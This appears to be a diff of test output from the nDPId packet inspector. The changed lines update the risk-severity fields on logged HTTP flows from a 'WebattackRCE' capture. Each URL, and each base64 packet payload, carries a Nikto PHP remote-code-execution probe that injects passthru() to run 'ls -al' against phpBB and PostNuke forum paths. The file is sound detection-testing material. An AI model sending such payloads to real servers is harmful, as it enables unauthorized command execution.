-01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"ts_msec":1576420277804,"pkt":"AAAAAAAAAAAAAAAACABFAAFsoC9AAEAGm1p\/AAABfwAAAcb6H5AztpkH42OkkoAYAED\/YAAAAQEICp1m\/1SdZv9UR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"ts_msec":1576420277807,"pkt":"AAAAAAAAAAAAAAAACABFAAFsAqdAAEAGOON\/AAABfwAAAcb8H5ASjTuPR79V4YAYAED\/YAAAAQEICp1m\/1edZv9XR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277808,"pkt":"AAAAAAAAAAAAAAAACABFAAFnxERAAEAGd0p\/AAABfwAAAcb+H5AIB\/1vYBeRA4AYAED\/WwAAAQEICp1m\/1idZv9YR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00898{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"ts_msec":1576420277810,"pkt":"AAAAAAAAAAAAAAAACABFAAFwFdRAAEAGJbJ\/AAABfwAAAccAH5A7eCz\/38X+m4AYAED\/ZAAAAQEICp1m\/1mdZv9ZR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01227{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"ts_msec":1576420277811,"pkt":"AAAAAAAAAAAAAAAACABFAAF1vbdAAEAGfcl\/AAABfwAAAccCH5DikYSaCicX\/4AYAED\/aQAAAQEICp1m\/1udZv9bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"ts_msec":1576420277812,"pkt":"AAAAAAAAAAAAAAAACABFAAFvwN5AAEAGeqh\/AAABfwAAAccEH5A7SvnykFHzA4AYAED\/YwAAAQEICp1m\/1ydZv9cR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"}
-01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
